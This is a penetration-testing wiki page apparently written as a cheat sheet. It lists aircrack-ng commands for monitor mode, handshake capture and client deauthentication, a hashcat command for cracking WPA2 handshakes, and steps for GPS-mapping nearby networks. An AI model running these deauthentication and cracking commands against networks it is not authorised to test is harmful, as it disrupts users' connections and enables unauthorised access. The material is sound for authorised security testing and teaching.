Grizzly Cyber Wiki
  • 👋Grizzly Cyber Security
  • ❓What is Cyber Wiki?
  • Web Testing
    • 🔑Session Token and APIs
      • Testing API Keys
      • Testing JSON WEB TOKENS
    • 🔍Discovery & Scanning
      • Custom Subdomain Wordlists
      • Subdomain Enumeration
      • Dir & Page Enumeration
      • Nuclei
    • 💉Injection Testing
      • CSV Injection
  • Wireless Testing
    • ðŸ“ķWPA2 Cracking
  • Miscellaneous
    • ðŸ’ŧHow to Proxy Linux Traffic
    • ðŸĪŠUseful Unique Resources
    • 📃Cheat Sheets
      • IDOR Cheat Sheet
      • NMAP Cheat Sheet
Powered by GitBook
On this page
  1. Wireless Testing

WPA2 Cracking

A few commands to crack WPA2 Handshakes

Start monitor mode

 airmon-ng start wlan0 

Start capturing wireless data

 airodump-ng wlan0mon 

Start capturing wireless data with focus on one SSID

 airodump-ng --bssid 1C:B8:AQ:3X:64:A0 -c 6 --write File_Name wlan0mon 

Deauthenticate clients connected to access point

 aireplay-ng --deauth 100 -a 01:81:31:78:24:76 wlan0mon 

Stop monitor mode

airmon-ng stop wlan0mon 

Change .cap to .hccapx for hashcat cracking

https://hashcat.net/cap2hccapx/

Hashcat Cracking

hashcat64.exe -a 0 -m 2500 --session=all --force -o "Output_File_Path" --outfile-format=3 -w 2 "Hash_File_Path" "Word_List_File_Path"

PLOT WIRELESS NETWORKS TO GPS MAP

Start airodump with GPS mode (Need GPS adaptor)

lsusb (finds the USB GPS) 
gpsd /dev/ttyUSB0
airodump-ng wlan0mon -w Building1Outside --gpsd

Use the output .csv file from the above with kismet to gain .kml file

giskismet --csv triangle-01.kismet.csv -q "SELECT * FROM wireless" -o all.kml 

Import .KML file to Google maps for GPS plotting

PreviousCSV InjectionNextHow to Proxy Linux Traffic

Last updated 2 years ago

ðŸ“ķ
https://www.google.com/maps